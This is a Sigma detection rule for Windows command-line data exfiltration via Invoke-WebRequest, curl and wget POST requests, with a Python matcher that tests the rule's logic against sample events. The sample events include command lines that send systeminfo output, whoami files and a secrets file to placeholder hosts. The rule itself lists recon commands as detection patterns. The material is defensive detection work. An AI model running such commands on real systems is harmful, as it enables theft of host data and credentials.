Potential Data Exfiltration Activity Via CommandLine Tools

Detects the use of various CLI utilities (PowerShell Invoke-WebRequest, curl, wget) sending data out via HTTP POST requests, where the same command line also references a typical reconnaissance or file-read payload.

Sigma rule

```yaml
title: Potential Data Exfiltration Activity Via CommandLine Tools
id: 7d1aaf3d-4304-425c-b7c3-162055e0b3ab
status: experimental
description: Detects the use of various CLI utilities exfiltrating data via web requests
references:
    - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022/08/02
modified: 2023/07/27
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_iwr:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'iwr '
            - 'wget '
            - 'curl '
        CommandLine|contains|all:
            - ' -ur' # Shortest possible version of the -uri flag
            - ' -me' # Shortest possible version of the -method flag
            - ' -b'  # Shortest possible version of the -body flag
            - ' POST '
    selection_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: '--ur' # Shortest possible version of the --url flag
    selection_curl_data:
        CommandLine|contains:
            - ' -d ' # Short form of the --data flag
            - ' --data '
    selection_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains:
            - '--post-data'
            - '--post-file'
    payloads:
        - CommandLine|contains:
              - 'Get-Content'
              - 'GetBytes'
              - 'hostname'
              - 'ifconfig'
              - 'ipconfig'
              - 'net view'
              - 'netstat'
              - 'nltest'
              - 'qprocess'
              - 'sc query'
              - 'systeminfo'
              - 'tasklist'
              - 'ToBase64String'
              - 'whoami'
        - CommandLine|contains|all:
              - 'type '
              - ' > '
              - ' C:\'
    condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
falsepositives:
    - Unlikely
level: high
```
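To see how the selections and the `condition` line compose, here is an added Python matcher that re-implements the rule's logic and runs it over constructed `process_creation` events. It is example code written for this page, not part of the Sigma project or of the rule itself. It assumes the standard Sigma semantics: `contains` and `endswith` are case-insensitive on Windows log sources, a list of values under one field is ORed, fields inside a selection are ANDed, the list of maps under `payloads` is ORed, and `all of selection_curl*` means `selection_curl and selection_curl_data`. Event IDs, paths and the `example.invalid` hosts are constructed sample values.

```python
"""Reference matcher for the Sigma rule above, run over constructed events."""
from typing import Dict, Iterable, List

Event = Dict[str, str]

# Constructed sample process_creation events (Image / CommandLine only).
# ev1-ev4 should match; ev5 and ev6 are benign look-alikes that should not.
SAMPLE_EVENTS: List[Event] = [
    {"id": "ev1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "Invoke-WebRequest -Uri http://example.invalid/up '
                    '-Method POST -Body (systeminfo | Out-String)"'},
    {"id": "ev2",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe --url http://example.invalid/c2 --data @C:\Users\Public\whoami.txt"},
    {"id": "ev3",  # 'curl' here is the PowerShell alias for Invoke-WebRequest
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "CommandLine": r'pwsh.exe -c "type C:\secrets.txt > C:\Users\Public\o.txt; '
                    r'curl -Uri http://example.invalid/x -Method POST -Body (Get-Content C:\Users\Public\o.txt)"'},
    {"id": "ev4",
     "Image": r"C:\Tools\wget.exe",
     "CommandLine": r"wget.exe --post-file C:\Users\Public\systeminfo.txt http://example.invalid/collect"},
    {"id": "ev5",  # POST without any payload keyword: not flagged
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe --url https://example.invalid/api/health --data "{\"status\":\"ok\"}"'},
    {"id": "ev6",  # plain download, no -Method/-Body: not flagged
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\Users\Public\tool.zip"'},
]


def _endswith_any(value: str, suffixes: Iterable[str]) -> bool:
    """Sigma 'endswith' with a value list: case-insensitive, ORed."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value: str, needles: Iterable[str]) -> bool:
    """Sigma 'contains' with a value list: case-insensitive, ORed."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def _contains_all(value: str, needles: Iterable[str]) -> bool:
    """Sigma 'contains|all': every listed substring must be present."""
    v = value.lower()
    return all(n.lower() in v for n in needles)


def matches_rule(event: Event) -> bool:
    """Evaluate the rule's selections and condition against one event."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")

    selection_iwr = (
        _endswith_any(image, ["\\powershell.exe", "\\pwsh.exe", "\\cmd.exe"])
        and _contains_any(cmd, ["Invoke-WebRequest", "iwr ", "wget ", "curl "])
        and _contains_all(cmd, [" -ur", " -me", " -b", " POST "])
    )
    selection_curl = _endswith_any(image, ["\\curl.exe"]) and _contains_any(cmd, ["--ur"])
    selection_curl_data = _contains_any(cmd, [" -d ", " --data "])
    selection_wget = (
        _endswith_any(image, ["\\wget.exe"])
        and _contains_any(cmd, ["--post-data", "--post-file"])
    )
    payloads = _contains_any(cmd, [
        "Get-Content", "GetBytes", "hostname", "ifconfig", "ipconfig", "net view",
        "netstat", "nltest", "qprocess", "sc query", "systeminfo", "tasklist",
        "ToBase64String", "whoami",
    ]) or _contains_all(cmd, ["type ", " > ", " C:\\"])

    # condition: (selection_iwr or all of selection_curl* or selection_wget) and payloads
    return (selection_iwr or (selection_curl and selection_curl_data) or selection_wget) and payloads


def find_matches(events: Iterable[Event]) -> List[str]:
    """Return the IDs of all events the rule would alert on."""
    return [e["id"] for e in events if matches_rule(e)]


if __name__ == "__main__":
    print(find_matches(SAMPLE_EVENTS))
```

The two benign events show why the `payloads` block is ANDed in: a POST on its own (ev5) or an Invoke-WebRequest download (ev6) is routine on many hosts, and the rule only fires when the same command line also touches host-enumeration output, a file read, or a `type ... > C:\` redirection. The short-flag prefixes (` -ur`, ` -me`, ` -b`) are what let ev1 and ev3 match whether the operator typed `-Uri` or `-uri`.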
